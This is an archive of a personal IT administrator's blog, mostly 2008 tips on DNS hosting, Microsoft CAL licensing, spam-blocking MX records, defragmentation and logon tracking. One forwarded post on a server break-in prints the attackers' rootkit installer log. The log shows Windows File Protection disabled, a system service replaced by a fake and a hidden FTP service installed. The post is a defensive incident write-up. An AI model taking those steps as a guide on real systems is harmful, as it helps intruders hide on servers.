what we have here is a failure to communicate

free DNS hosting

2009-01-08T07:09:00.001-08:00

Whatever is your reason, here’s a list of free DNS hosting or NS service providers if you need one. Not that those DNS service or dynamic DNS services only supports shared third level hostname (i.e username.dns-subdomain.com) and not self own (core) fully qualified top and second level domain name are excluded from the list.

Bur.st Networking - Provides domain hosting and domain seconding (secondary DNS), complete with mail hosting and backup mail server. Bur.st has a number of redundant name-servers, located at logicaly and physicaly separate sites. Only available to those physically live in Australia.
dnsEXIT - provides reliable DNS Services free to top level domains for both business and internet users. The DNS supports Dynamic IP that means users will be able to run your own website, ftp, or mail servers via DSL, cable modem lines with dynamic IP. Features DNS Tools record creation wizard.
DNS Park - Current promotion in AdWords campaign is offering free services just to try DNS Park service. The free service tokens do not expire so users can use them forever. Free services available are DNS Hosting, Mail Guiding, Web Guiding and Web Camping.
DynDNS.dk - Current pricing for DNS Pro service is free which enables users to manage all name related aspects for own domain names. Include special features such as dynamic updateable IP-addresses and browser
request forwarding (to another URL). All the standard name server settings (A-, CNAME-, MX-records etc.) can be controlled.
EditDNS - Free DNS hosting supports A, CNAME, MX, NS, SRV, TXT, PTR, and AAAA records, backup DNS, dynamic DNS, sub-domains, web forwarding, e-mail forwarding, email hosting, e-mail backup, MX re-routing, and spam and virus email filtering. Europe and US nameservers available.
EveryDNS - Provides static free DNS services as well as many advanced services such as Dynamic DNS resolution, Secondary service, AXFR service, and domain2web redirection.
freeDNS.afraid.org - Free dynamic DNS and static DNS services, subdomain hosting, domain hosting, backup DNS, forward and reverse IPv6 DNS hosting (both .int and .arpa) and URL redirection or web forwarding. Support unlimited number of domains per account, all TLD, and record types including CNAME, A, AAAA, MX, NS, TXT, LOC, RP, HINFO, SRV records. Also features round robin DNS supported for load balancing and URL cloaking redirection. Users can edit TTL, Minimum, Allow/Deny AXFR’s, and approve/disapprove others from using hosts on your domain.
Granite Canyon - The free public DNS service offers both primary and secondary DNS.
Gratis DNS - Free DNS service in Danish language.
miniDNS - Provides hosting for your own top-level domain name, support dynamic IP to fixed domain name mapping, and web based DNS record management.
MyDomain - Sign up and register a free account to use the free web-based DNS Management service. No purchase necessary. Also included free e-mail forwarding, unmasked, masked or banner supported URL forwarding.
Sitelutions - Free internationally redundant high-quality NS server for DNS (dynamic and static), URL redirection or forwarding). Supports domain parking and domain locking and using easy web-based control for DNS and redirection settings. Allows low TTL settings and instant dynamic updates.
Twisted4Life - Free secondary DNS for domains which users have control of its DNS settings on primary DNS server.
VCSWEB - Free DNS Service (a Primary and a Secondary) which support both static or dynamic IP address, with an easy to use interface that even beginners can use, whilst not restricting the more advanced users. All changes has real-time updates.
VDirect - Offers free virtual web, domain and email
redirection service, with cloaking and website statistics features. Advertising supported using a banner at bottom of redirected page, popup banner, or a banner delay page. Paid service for no adverts.
XName - Provides primary and secondary name servers, which hosted on 3 name servers. Supports IPv6 AAAA records, .in-addr.arpa zones (PTR records), automatic modification of associated reverse (or normal) zone, dynamic update, and automatic refresh.
ZoneEdit - Provides free managed DNS service and secondary name service with servers in US and Europe. Also offers free WebForward domain forwarding, MailForward email forwarding, starter web page and domain parking. Supports dynamic DNS (DDNS) and failover or load balancing. Free service limited to maximum 5 domains.

The system cannot find the file specified when opening Excel attachment in Outlook

2008-10-20T05:49:00.001-07:00

The system cannot find the file specified when opening Excel attachment in Outlook

I have been getting this error for the last couple of weeks and today decided to troubleshoot it. Turns out there is an option in Excel "Ignore other applications that use DDE". Once I unchecked this my problem went away.

picture storage

2008-09-06T09:33:00.001-07:00

http://www.flickr.com/ ß l prefer this, but it costs $24.95 a year for unlimited storage, but very cool.

http://www.google.com/picasa/ Google’s version of flickr, not as spiffy but they give you 10 gigs of storage for free.

http://www.snapfish.com/ hp version of flickr

http://www.kodakgallery.com/photovoice Kodak version

http://www.getdropbox.com ß this is really cool, you just drop pictures into your drop box and they get automatically uploaded to your account on the net. However it is limited to 2 gigs and is in beta

More I found but have not tried…

http://photobucket.com/

http://www.fotki.com/us/en/

Paid online backup storage:

http://mozy.com/

How many CALs does John Smith need?

2008-08-15T15:10:00.001-07:00

How many CALs does John Smith need?

A few weeks back, I built a slide now referred to by several as the “John Smith” slide to help explain how User CALs work and to dispel some misconceptions out there (this slide was included in my SBS Licensing session that you can view online). Since this has come up several times, I thought I would share it here with the explanation. First, here is the slide:

(click on image for full size)

So the question that seems to come up is, if you have an SBS User CAL, what is a User and how do log-in names work?

A User is a physical person. In my slide, it is the physical person pictured there that I named John Smith. John Smith the person has the SBS User CAL associated with him and he as a person can use that SBS User CAL to access the SBS Server from any device. So as you can see in the slide, John Smith logs in from 5 different PCs. How does that affect the number of CALs he needs? How many physical Users is John Smith? One. As such, John Smith is covered by his one User CAL.

Well, what if John Smith has a “split personality” and logs in to the SBS Server using several different log-in names? (Examples listed on my slide include: Jsmith, Johns, John_Smith, J.smith, John.Smith, Sales1, and Sales2) How does that affect the number of CALs he needs? How many physical Users is John Smith? One. As such, John Smith is still covered by his one User CAL.

So, User CALs are associated with a PHYSICAL USER. They are not shared by Users, each User must have their own User CAL. Once a User has their own User CAL, it does not matter how many machines they log in from or how many different log in names they use. They are still one physical User and covered by the one User CAL.

Now, if John Smith the physical User were to log in from a device and walk away, can Sally Sue, a different physical User use that device? Not unless Sally Sue has her own User CAL because John Smith’s User CAL belongs to him and cannot be used by another User. So, if you choose to use User CALs, you need one per physical User.

Thank you and have a wonderful day,

Eric Ligman
Microsoft US Senior Manager
Small Business Community Engagement
This posting is provided "AS IS" with no warranties, and confers no rights

__________ Information from ESET NOD32 Antivirus, version of virus signature database 3360 (20080815) __________

The message was checked by ESET NOD32 Antivirus.

http://www.eset.com

Licensing Basics: What are CALs (Client Access Licenses)?

2008-08-15T15:09:00.003-07:00

Licensing Basics: What are CALs (Client Access Licenses)?

A Client Access License (CAL) is a license granting access to certain Microsoft server software. CALs are used in conjunction with Microsoft Server software licenses to allow Users and Devices to access and utilize the services of that server software. For instance, a company looking to utilize Microsoft Windows Server would acquire a Microsoft Windows Server license in order to install and run the Windows Server software on the physical server itself. In order to provide the rights for Users or Devices to access the Windows Server software running on the server, CALs would need to be acquired for those Users or Devices in order to do so.

Different types of CALs: There are three different options available for acquiring CALs depending on the needs of your company and the server software you are acquiring CALs for:

User CAL – A User CAL allows a single unique physical user to access Microsoft server software from many devices, such as a work computer, a home computer, a laptop, an Internet kiosk, or a personal digital assistant (PDA), without having to acquire CALs for each device.

NOTE: We license by physical user, not log-in name. Take a look at the John Smith example for more on this.

Device CAL - A Device CAL allows any number of physical users to access Microsoft server software through a single device.
Processor License - A Processor License includes access for an unlimited number of users to connect from either inside the local area network (LAN) or wide area network (WAN) or outside the firewall. You do not need to purchase additional server licenses, CALs, or Internet Connector Licenses when you acquire Processor Licenses. If utilizing Processor licenses, one processor license must be purchased for each physical processor.

Processor licenses are only available for some Microsoft server products, such as: Application Center, BizTalk Server, Commerce Server, Content Management Server, Host Integration Server, Identity Integration Server, ISA Server, SQL Server, and Operations Management Server. There is a chart of server products showing which ones offer Per Processor licensing on the Microsoft CAL Guide page.
NOTE: Windows Server, Exchange Server, and Small Business Server do NOT offer Per Processor options

Version numbers matter: Just like the Server products that CALs are associated with, they have version numbers. For instance, for Windows Server 2003, there is a Windows Server 2003 license and there are Windows Server 2003 CALs. The version number of the CALs being used to access the server software must be the same or higher than the version of the Server software running. As an example, once Windows Server 2008 is released, if you were to purchase a license of Windows Server 2008 to replace your Windows Server 2003 (or if you had Software Assurance on your Windows Server license and received the 2008 version through your upgrade protection) and install that in your company, your Windows Server 2003 CALs would no longer have rights to access the server running Windows Server 2008, since the 2008 version is newer than the 2003 version. As such, you would need Windows Server 2008 CALs to access the Windows Server 2008 server software. Again, if you have Software Assurance for your Windows Server 2003 CALs when Windows Server 2008 is released, then you would receive rights to Windows Server 2008 CALs through the upgrade protection included in the Software Assurance. Note: You can purchase newer CALs to access older server versions. For instance, a Windows Server 2008 CAL can be used to access a Windows 2003 server since the CAL version is newer than the Server version.

Different Microsoft server products: If you are running multiple Microsoft server products, remember that there are CALs associated with each and you would need to acquire the appropriate CALs for each. For instance, if you are running Microsoft Windows Server and Microsoft Exchange Server, you would need both a Microsoft Windows Server CAL and a Microsoft Exchange Server CAL to access these servers since Microsoft Exchange uses Active Directory (Windows Server technology) for authentication; therefore, you are accessing both the Microsoft Windows Server and the Microsoft Exchange server when checking your email.

Multiple servers in domain: Microsoft server CALs can be used to access multiple servers of the same kind throughout your domain. For instance, if you have a Windows Server 2003 Device CAL for a workstation, that Windows Server 2003 CAL gives that workstation the rights to access any Windows Server 2003 throughout the domain, not just a single Windows Server 2003.

Here is some more information on CALs that you may be interested in:

Thank you and have a wonderful day,

Eric Ligman
Microsoft US Senior Manager
Small Business Community Engagement
This posting is provided "AS IS" with no warranties, and confers no rights

Published Tuesday, November 06, 2007 11:40 AM by mssmallbiz

Filed under: Licensing, SBS, Events & Webcasts, Partner Information, Windows Server, Licensing Basics, Exchange

Comments

How can you tell if your client has User or Device CALs for their server?

2008-08-15T15:09:00.001-07:00

How can you tell if your client has User or Device CALs for their server?

I saw a question recently from a Partner stating that they had a new client and were trying to determine if the CALs they client was using were User or Device CALs. The way to determine which your client has is actually quite straight forward:

1) If they purchased a server license that came with 5 CALs initially, those first five CALs can be User or Device and they get to determine which they are upon installation. You should check their original Server license to determine if it came with 5 CALs.

2) For each CAL pack beyond the initial 5 that came with the server, they would have had to purchase either User or Device CALs. Simply look at the licenses they purchased to see if they are User or Device CALs.

What if you cannot find the original licenses to see if the server had 5 CALs or to see if they are User or Device CALs? You might want to read my, “How can you tell if your client has OEM, Retail Box or Volume License software?” post since there is a chance they may no longer have the license rights to use the software they have installed, unless they purchased their licenses through Volume Licenses which are electronic licenses that cannot be lost.

Once you look at their licenses, you will see how many User or Device CALs they have for their various servers. Remember that User CALs and Device CALs cannot be transformed into the other type after purchase, so be sure your clients are making informed decisions prior to purchasing their CALs to ensure they are choosing the option that is most appropriate for them. The only times you can switch from User to Device CALs or vice versa is:

1) If you have Software Assurance for your CALs: when you renew your Software Assurance, you can renew for the other type of CALs instead. (i.e.: if you have Device CALs with Software Assurance, when you renew your Software Assurance, you could purchase the User CAL Software Assurance instead to renew the SA and convert to User CALs then)

2) If you have a company-wide Agreement for your CALs, such as the Small Business Desktop Advantage or Desktop Professional, then you have the right to have the CALs be User or Device and you can switch at anytime during the term of your Agreement.

I also cover this in more depth in the “Introduction to Office, Windows, and Server Licensing for Partners” webcasts I gave if you want to view the replay.

Thank you and have a wonderful day,

Eric Ligman
Microsoft US Senior Manager
Small Business Community Engagement
This posting is provided "AS IS" with no warranties, and confers no rights

__________ Information from ESET NOD32 Antivirus, version of virus signature database 3360 (20080815) __________

The message was checked by ESET NOD32 Antivirus.

http://www.eset.com

blocking referers

2008-08-04T04:08:00.001-07:00

I was searching for help for the same problem. A photographer client suddenly had 1gb of bandwidth per day (up from his usual 100-150mb).
So I went to "latest visitors" in cpanel, under "Analysis and Log files" and quickly found the culprit to be a referring page from stumbleupon.com

To fix it, I found this for .htaccess file:

PHP:

RewriteEngine on
RewriteCond %{HTTP_REFERER} ^<a href="http://" target="_blank">http://</a>(www.)?stumbleupon.com
RewriteRule .* - [F]

and now, when you click the link to his site from the offending stumbleupon page, you get a lovely:

quote:

Forbidden
You don't have permission to access /images.php on this server.

Works for me! Hope that helps.

public preview small business server 2008

2008-07-26T07:04:00.001-07:00

http://technet.microsoft.com/en-us/evalcenter/cc184870.aspx

Published: May 28, 2008

Designed for small businesses, Windows Small Business Server 2008 is an affordable, integrated server solution that helps you protect your business data, increase productivity and present a more professional image to customers – giving you the tools you need to help grow your business capacity. And when you download the latest public preview software, you're automatically registered to access valuable public preview resources assembled in one convenient location.

Please review the Windows Small Business Server 2008 Public Preview system requirements before you proceed. Actual requirements and product functionality may vary based on your system configuration.

Use the following product key to activate your trial of the Windows Small Business Server 2008 Public Preview software.

Windows Small Business Server 2008 Standard Product Key: YH2BV-9YMTM-MP7DC-KDCH4-FC9C3

Windows Small Business Server 2008 Premium Product Key:

1st Server: YH2BV-9YMTM-MP7DC-KDCH4-FC9C3
2nd Server: 242HC-R6RR6-WM2M8-J4BMK-7VV9R

The Public Preview software is being made available so you may test and explore the software. As this is not final release code, you may not test the software in a live operating environment.

microsoft business critical partner support

2008-07-26T06:21:00.001-07:00

Microsoft response to Q&A in comment section (Call-Back support announcement)

Microsoft response to Q&A in comment section (Link to original post)

Community Question:

Are we to assume this excludes business down? Does this mean that "Server Down" support calls will no longer be free?

Microsoft Response:

This business change includes Business Critical Partner Support yet does not change any of the benefits of that program. Business Critical cases continue to be offered at no charge to our partners, the only change is that we will call you back once you call into 1-800-936-4900 to create the incident. Please note - we currently do not allow Severity "A" or BCPS cases to be submitted online (we plan on adding this in the future), at this time the online tool only covers "Pay Per Incident" or contract cases (Software Assurance, MSDN/TechNet, etc.).

Please continue to call BCPS cases into customer service until we update our online submission portal.

Community Question:

If someone calls with a CritSit will they be given a live transfer?

Microsoft Response:

A Critical Situation (CritSit) is a Premier offering (http://www.microsoft.com/services/Microsoftservices/srv_premier.mspx) and not a Professional support level offering. This business change is only for Professional SBS level customers, all Professional level SBS incidents will be handled on a call-back basis.

bogus mx records to stop spam

2008-07-25T13:54:00.001-07:00

By Mark Joseph Edwards

Quirks in the mailer programs spammers use to deliver mail can be turned against the senders.

This week, I share with you a little-known technique you can use to block a lot of spam before it ever reaches your mail server.

Simple DNS changes eliminate unwanted junk mail

Spam is — of course — a bane on the Internet. It drags down mail-server performance, puts a large load on mail clients, bothers recipients to no end, and causes us to spend money on antispam tools when that money might be better spent elsewhere.

But all is not lost: A little-known technique helps reduce spam levels on mail servers without costing you anything other than a few minutes of your time. (See Ian "Gizmo" Richards's Best Software column today for tips on blocking spam from client PCs.)

Spammers typically use a number of tactics to deliver junk mail. Some spammers rely on third-party mail servers that relay mail from any sender (typically called an open relay). Others use computers that have been assimilated into botnets, custom mailer software designed to behave similarly to a regular mail server, or any number of other tactics.

In my battles with the spam that is sent to the domains I manage, I have found that many spammers use custom mailer software. As it turns out, a lot of those custom programs have quirks that we can take advantage of to fight back against the spammers.

Before I explain how to do that, you need to know a little bit about how mail servers deliver messages. When a legitimate mail server tries to deliver mail to a recipient at a third-party domain, it first looks up the mail exchange (MX) records for that domain. The MX records tell the world which mail servers receive mail for the recipient's domain.

Each MX record is configured with a numeric priority level that determines which is the primary mail server, the secondary mail server, and so on. The lower the priority number, the higher the precedence. For example, an MX record with a priority of 10 takes precedence over an MX record with a priority of 15. That precedence order is the core of the technique I'm about to explain.

The custom mailer software used by spammers typically uses only the mail server with the highest precedence — the one with the lowest priority number. So even if you have five MX records for five mail servers in your domain, the spammers' mailer software will usually try to deliver mail to only one of them.

If that server doesn't respond, the mailer software simply drops its attempt to deliver the spam message and moves on to the next recipient on its list.

Conversely, legitimate mail servers will try to deliver the message to the other four mail servers in the order of precedence listed in a domain's MX records. If none of them responds, or if you have only one mail server — and thus only one MX record — then a legitimate mail server will most likely hold the message and try to resend it for a period of time determined by the mail server's configuration.

In short, legitimate RFC-compliant mail servers make several attempts to deliver mail, while a spammer's custom mailer software will likely make only one delivery attempt.

That's why you can eliminate a lot of spam by using a bogus host name to create an MX record for your domain and give that record the highest precedence by assigning it the lowest priority number. Then give your real mail servers' MX records a lower precedence than the bogus entry.

Since the fake server will never be reachable, a lot of spam will never be delivered to your domain. At the same time, legitimate mail will make it through as long as the sending mail server adheres to typical SMTP mail-server specifications (nearly all of them follow the specs).

The host name you use for the fake MX record can be any name that does not resolve via DNS. For example, you could create a set of MX records using the names listed below; blackhole.domain.tld is the bogus host name that has no corresponding 'A' record (i.e., address record) in DNS, while mailserver1 and mailserver2 are real mail servers.

IN MX 5 blackhole.domain.tld.
IN MX 10 mailserver1.domain.tld.
IN MX 15 mailserver2.domain.tld.

The actual syntax for creating DNS records varies depending on how your DNS tables are configured. The example above provides the gist of what you or your network administrator needs to know in order to make this technique work for you.

I've been using this spam-blocking tactic on one of the domains I manage for well over a year and half. It's important to note that I have not seen any instance where legitimate mail flow was hampered as a result.

Nevertheless, test your own results carefully! If anyone complains that mail they sent to you is bouncing, they're probably using a noncompliant mail server. Those instances should be incredibly rare, or nonexistent.

The spam levels for the domain I used to test this technique dropped like a rock. Before implementing this method, one particular e-mail address at the domain was receiving more than 1,000 spam messages every day. Shortly after I implemented this technique, the overall spam level dropped by well over 60 percent. Your results for total spam reduction will vary, of course.

If you run your own in-house DNS servers, you (or your network administrator) can configure MX records without much problem. However, if you use a hosting company to handle your DNS, you may have to ask the company to configure the bogus MX record for you, or you might have to use a custom Web-based DNS configuration interface provided by the hosting company.

In the latter case, it may be necessary to trick the interface into allowing you to define a bogus MX record by first creating an 'A' record for the bogus host using a bogus IP address.

After doing that, you then define the bogus MX record using that bogus host name. When you're finished, delete the 'A' record, since you don't want the bogus host name to resolve to any IP address.

__________ Information from ESET NOD32 Antivirus, version of virus signature database 3300 (20080725) __________

The message was checked by ESET NOD32 Antivirus.

http://www.eset.com

defrag

2008-07-07T04:50:00.001-07:00

JkDefrag is completely automatic.
The commandline options are not needed for normal use.

JkDefrag is ready to run, just click the "JkDefrag" program. Default behavior is to automatically process all the mounted, writable, fixed volumes on your computer. You can change this behavior with the following commandline options:

For example:

JkDefrag.exe -a 7 -d 2 -q c: d:

-a N

The action to perform. N is a number from 1 to 11, default is 3:
1 = Analyze, do not defragment and do not optimize.
2 = Defragment only, do not optimize.
3 = Defragment and fast optimize [recommended].
5 = Force together.
6 = Move to end of disk.
7 = Optimize by sorting all files by name (folder + filename).
8 = Optimize by sorting all files by size (smallest first).
9 = Optimize by sorting all files by last access (newest first).
10 = Optimize by sorting all files by last change (oldest first).
11 = Optimize by sorting all files by creation time (oldest first).

-e "mask"

Exclude files and/or directories that match the mask. The items will not be defragmented and will not be moved. Use wildcards '*' and '?' in the mask to match a set of files or directories. If the mask contains a space then it must be enclosed in double-quotes. Some examples:

JkDefrag -e *.avi -e *.zip -e *.log

JkDefrag -e D:\MySQL\Data\*

-u "mask"

Files that match a mask will be moved to the SpaceHogs area. The program has a built-in list for all files bigger than 50 megabytes, files not accessed in the last month, archives, files in the recycle bin, service pack files, and some others. Disable this list by specifying the special mask "DisableDefaults". Use wildcards '*' and '?' in the mask to match a set of files or directories. If the mask contains a space then it must be enclosed in double-quotes. Some examples:

JkDefrag -u *.avi -u *.zip -u *.log

JkDefrag -u D:\MySQL\Data\*

-s N

Slow down to N percent (1...100) of normal speed. Default is 100.

-f N

Set the size of the free spaces to N percent (0...100) of the size of the volume. The free spaces are room on disk for temporary files. There are 2 free spaces, between the 3 zones (directories, regular files, SpaceHogs). Default is 1% (per free space).

-d N

Select a debug level, controlling the messages that will be written to the logfile. The number N is a value from 0 to 6, default is 1:
0 = Fatal errors.
1 = Warning messages [default].
2 = General progress messages.
3 = Detailed progress messages.
4 = Detailed file information.
5 = Detailed gap-filling messages.
6 = Detailed gap-finding messages.

-l "filename"

Specify a filename for the logfile. Default is "JkDefrag.log" and "JkDefragCmd.log". Specify empty string "" (two double-quotes) to disable the logfile.

-h

[commandline version only] Show a short help text.

-help

[commandline version only] Show a short help text.

--help

[commandline version only] Show a short help text.

-q

[windows version only] Quit the program when it has finished.

items

The items to be defragmented and optimized, such as a file, directory, disk, mount point, or volume, including removable media such as floppies, USB disks, memory sticks, and other volumes that behave like a harddisk. Wildcards '*' and '?' are allowed to select a set of files. If the item contains a space then it must be enclosed in double-quotes. Some examples:

JkDefrag C: D:

JkDefrag f:\*.log D:\MySQL\Data\*

Fast optimization

This optimization strategy is designed for every day use. It moves a minimum of data on the harddisk and finishes very quickly, but will not fill all the gaps on the disk. The strategy scans for gaps on the disk and fills them with files from above.

Sorted optimization

All the sorting optimizations WILL CREATE FRAGMENTS. This is by design, it is not a bug. For more info see the Frequently Asked Questions.
These sorting optimizations are for incidental use once in a while. They take a lot of running time and data movement because they rewrite all the data on the disk. The strategies vacate a small area on disk and then fill it up again with the files in the selected order.

· Sort by name: very good for fast program starting. The files used by a particular program will be very close together on disk.

· Sort by size: placing all the small files together at the beginning of the disk will dramatically reduce the average file seek time.

· Sort by last access: files that have not been accessed in a while are probably unimportant and are best sorted to the back.

· Sort by last change: placing files together that change a lot (for example databases and log files) will speed up regular operation of the system.

· Sort by creation time: The oldest files on the disk are likely to be important system files, for example used when Windows is booting.

Note: If you want to sort by last access time then first make sure your virus scanner (and other programs that scan all files on disk) do not change that time.

Force together

Intended for partition resizing. All movable files are moved to the beginning of the disk, even if it means fragmenting them to fill gaps that cannot be filled otherwise.

Move to end of disk

Move all the files to the end of the disk, making more room at the beginning of the disk. Intended for big and rarely used files such as log files, backup archives, installation files, and such.

track login and logoff times

2008-07-03T14:41:00.000-07:00

1) Open the Default Domain Policy\User Configuration\Windows Settings\Scripts

2) Create a bat-file in the Logoff folder and a bat-file in the Logon folder like these:

(use a delimited format (probably CSV), so that the data can easily be analysed with Access or Excel or whatever application takes your fancy)

for userlogontime.bat:

@echo Logon,%USERNAME%,%COMPUTERNAME%,%DATE% %TIME% >> \\MyServer.local\Share$($ hides it from the users so you can give them FC sharing and security permissions on the share to be able to write to it no problem)\\Logons.csv

for userlogofftime.bat:

@echo Logoff,%USERNAME%,%COMPUTERNAME%,%DATE% %TIME% >> \\MyServer.local\Share$($ hides it from the users so you can give them FC sharing and security permissions on the share to be able to write to it no problem)\Logons.csv

(Note that I have deliberately left a space between date and time rather than a comma. This way, Access/Excel/Whatever will automatically combine the two items together. This is useful since it simplifies any time calculations you might want to do (if they're separate items, you have to write formulae to cope with date changes and stuff like that).

”>>” means ”append output to the following location:”

If you add

>>\\MyServer.local\Share\%USERNAME%_Logons.csv

to the end of the commands, you will also get a logging-file for each user:

LOGOFF.BAT

@echo Logoff,%USERNAME%,%COMPUTERNAME%,%DATE% %TIME%

>>\\MyServer.local\Share\Logons.csv

>>\\MyServer.local\Share\%USERNAME%_Logons.csv

The batch files are run as if they are on the user's local machine, thus the part after >> will go to a file (which is created automatically) located as if the address were run at the local machine's own Run... prompt (eg. if located at c: then it will be on the local machine's c: not the server's)

To open the user logon\logoff log file open \\MyServer.local\Share and double click on logons.csv. Right click on the column that contains the date and time. Select Format Cells…..Custom – dd/mm/yyyy hh:mm. If desired, Save as… and rename it logonsddmmyy and choose to save it as an Excel spreadsheet. When finished, close all open spreadsheets without saving.

FW: Stupid is as Stupid does

2008-07-03T13:03:00.000-07:00

Feed: THE OFFICIAL BLOG OF THE SBS "DIVA"
Posted on: Wednesday, July 02, 2008 3:10 PM
Author: bradley
Subject: Stupid is as Stupid does

I was stupidier than I thought.

I thought that the bad guys nailed me on 6/6/2008. But in reviewing the information on the files that were dumped on the box on that day was a file called KB1920213.log, they nailed me earlier than I thought they did. Which points out the stupid thing I did. I was not monitoring the system truly as well as I should have. The installer process on this box was not being monitored by me. If I had been I would have noticed that back in May (the log file date of 4/14 appears to be incorrect based on other evidence) was when they really broke in via the php file in Merak email software.

The mitigation I have in place now is two fold, first all ports are limited (with the exception of port 80, 443 and 25). The port that they nailed me on, port 32000 is no longer open to all listserve administrators from any location. This means the balancing act between security and functionality as I find a happy medium. Secondly I now have EventSentry on the box so that if someone sneezes near it, I'm alerted.

But this points out the fact that a restore from a backup from a date you think the bad guys got in may not be the right date. If I had merely gone from the intial evidence I saw, that date would have been 6/6/2008. Now with this additional evidence, that date is (edit) ~~5/15/2008~~ 5/14/2008. Furthermore, one has to be a tad paranoid to look at the data I put back. Given the manner in which the server is set up, I am reasonably confident that the data was not mangled with. But it sure does give one pause, doesn't it?

When the bad guys script and leave behind log files so that their system is set up properly...it just puts a lot more paranoia in one, doesn't it?

Anatomy Of A Hack: How A Criminal Might Infiltrate Your Network:
http://technet.microsoft.com/en-us/magazine/cc160808.aspx

Read that and think about what holes there are in your security stance. There definitely was holes in mine.

Computer Date_Time Source Text

YODA 2008-06-06 05:40:16 FSInfo_C_NTFS.csv Last Write: C:\WINDOWS\KB1920213.log

Coded by: SlaYeR and COLdGiN
And Many thanks to Bullet! our big ass teamleader! Version 1.0
[Xcacls.exe is redownloaded!]
Kit started date: Wed May 14 13:13:10 2008

+================+
+ Version 1.0 +
+================+
[Scanning for Anti-Virus applications...]
+================+
+ Systeminfo +
+================+
OS: Windows 2003 [vesion 5.2.3790] Service Pack 2

Host Name:YODA
Windows Dir:(C:\WINDOWS)
System Dir:(C:\WINDOWS\system32)
Uptime: 0d 16h 23m 3s

Total CPU cores:2
System speed: 2813 Mhz

RAM Usage: 1545/2032 MB (76%)

+----------------------------------------------------------+
C:\ Name:()Total:35291.MB->34.GB Free:13566.MB->13.GB Type:NTFS Source:LOCAL

D:\ Name:(New Volume)Total:238464.MB->232.GB Free:139778.MB->136.GB Type:NTFS Source:LOCAL

E:\ Name:()Total:476929.MB->465.GB Free:432612.MB->422.GB Type:NTFS Source:LOCAL

F:\ Name:(WD Passport)Total:57215.MB->55.GB Free:35055.MB->34.GB Type:NTFS Source:LOCAL

+----------------------------------------------------------+
[2008-4-14 13:13:11] --> [Hello! ^^ I'm Ph0eniX and I'm installing your files..]
[2008-4-14 13:13:12] --> [Verrry Niice ^^ Windows File Protection has been disabled!]
[2008-4-14 13:13:12] --> [O Oh ^^ Real SysmonLog service deleted!]
[2008-4-14 13:13:12] --> [smlogsvc.exe Deleted!]
[2008-4-14 13:13:12] --> [smlogsvc.exe copyed to system32!]
[2008-4-14 13:13:12] --> [arper.exe copyed to system32!]
[2008-4-14 13:13:12] --> [aproman.exe copyed to system32!]
[2008-4-14 13:13:12] --> [sysmem.dll copyed to system32!]
[2008-4-14 13:13:12] --> [memdump.dll copyed to system32!]
[2008-4-14 13:13:12] --> [Fake smlogsvc.exe loaded!]
[2008-4-14 13:13:13] --> [smlogsvc.exe started!]
[2008-4-14 13:13:13] --> [Sysmon.exe copyed to system32!]
[2008-4-14 13:13:13] --> [serv-u body service created!]
[2008-4-14 13:13:14] --> [Yay ^^ Service corectly created for the serv-u]
[2008-4-14 13:13:15] --> [Happy Time ^^ Sysmon.exe started!]
[2008-4-14 13:13:17] --> [start.exe cleaned!]
[2008-4-14 13:13:17] --> [firewall.reg cleaned!]
[2008-4-14 13:13:17] --> [arper.exe cleaned!]
[2008-4-14 13:13:17] --> [xcacls.exe cleaned!]
[2008-4-14 13:13:19] --> [See you in hell ^^ i'm committing suicide bye bye!]

Coded by: SlaYeR and COLdGiN
And Many thanks to Bullet! our big ass teamleader! Version 1.0
[Xcacls.exe is redownloaded!]
Kit started date: Fri Jun 06 05:40:07 2008

+================+
+ Version 1.0 +
+================+
[Scanning for Anti-Virus applications...]
+================+
+ Systeminfo +
+================+
OS: Windows 2003 [vesion 5.2.3790] Service Pack 2

Host Name:YODA
Windows Dir:(C:\WINDOWS)
System Dir:(C:\WINDOWS\system32)
Uptime: 23d 8h 49m 29s

Total CPU cores:2
System speed: 2813 Mhz

RAM Usage: 1485/2032 MB (73%)

+----------------------------------------------------------+
C:\ Name:()Total:35291.MB->34.GB Free:13100.MB->12.GB Type:NTFS Source:LOCAL

D:\ Name:(New Volume)Total:238464.MB->232.GB Free:128084.MB->125.GB Type:NTFS Source:LOCAL

E:\ Name:()Total:476929.MB->465.GB Free:190009.MB->185.GB Type:NTFS Source:LOCAL

F:\ Name:(WD Passport)Total:57215.MB->55.GB Free:256.MB->0.GB Type:NTFS Source:LOCAL

+----------------------------------------------------------+
[2008-5-6 5:40:8] --> [Hello! ^^ I'm Ph0eniX and I'm installing your files..]
[2008-5-6 5:40:9] --> [Verrry Niice ^^ Windows File Protection has been disabled!]
[2008-5-6 5:40:9] --> [O Oh ^^ Real SysmonLog service deleted!]
[2008-5-6 5:40:9] --> [Cannot delete smlogsvc.exe! still running?]
[2008-5-6 5:40:9] --> [smlogsvc.exe Failed to copy to system32!]
[2008-5-6 5:40:9] --> [arper.exe copyed to system32!]
[2008-5-6 5:40:9] --> [aproman.exe Failed to copy to system32!]
[2008-5-6 5:40:9] --> [sysmem.dll Failed to copy to system32!]
[2008-5-6 5:40:9] --> [memdump.dll Failed to copy to system32!]
[2008-5-6 5:40:9] --> [Fake smlogsvc.exe loaded!]
[2008-5-6 5:40:10] --> [smlogsvc.exe started!]
[2008-5-6 5:40:10] --> [Heey! old serv-u found! reinstalling the serv-u!]
[2008-5-6 5:40:10] --> [Failed to kill real Sysmon.exe!]
[2008-5-6 5:40:10] --> [Cannot delete Sysmon.exe! still running?]
[2008-5-6 5:40:10] --> [Sysmon.exe Failed to copy to system32!]
[2008-5-6 5:40:10] --> [serv-u body service created!]
[2008-5-6 5:40:10] --> [Yay ^^ Service corectly created for the serv-u]
[2008-5-6 5:40:11] --> [Happy Time ^^ Sysmon.exe started!]
[2008-5-6 5:40:14] --> [start.exe cleaned!]
[2008-5-6 5:40:14] --> [firewall.reg cleaned!]
[2008-5-6 5:40:14] --> [arper.exe cleaned!]
[2008-5-6 5:40:14] --> [xcacls.exe cleaned!]
[2008-5-6 5:40:16] --> [See you in hell ^^ i'm committing suicide bye bye!]

View article...

How A Criminal Might Infiltrate Your Network

2008-07-03T13:00:00.000-07:00

Hacking: Fight Back

How A Criminal Might Infiltrate Your Network

Jesper Johansson

At a Glance:

Paths hackers can use to infiltrate networks
What patching and version states reveal
IIS and SQL injection attacks
The dangers of elevated privileges

Security and Hacking

Network Setup

IIS

SQL Server

One of the great mysteries in security management is the modus operandi of criminal hackers. If you don't know how they can attack you, how can you protect yourself from them? Prepare to be enlightened.

This article is not intended to show you how to hack something, but rather to show how attackers can take advantage of your mistakes. This will enable you to avoid the common pitfalls that criminal hackers exploit.

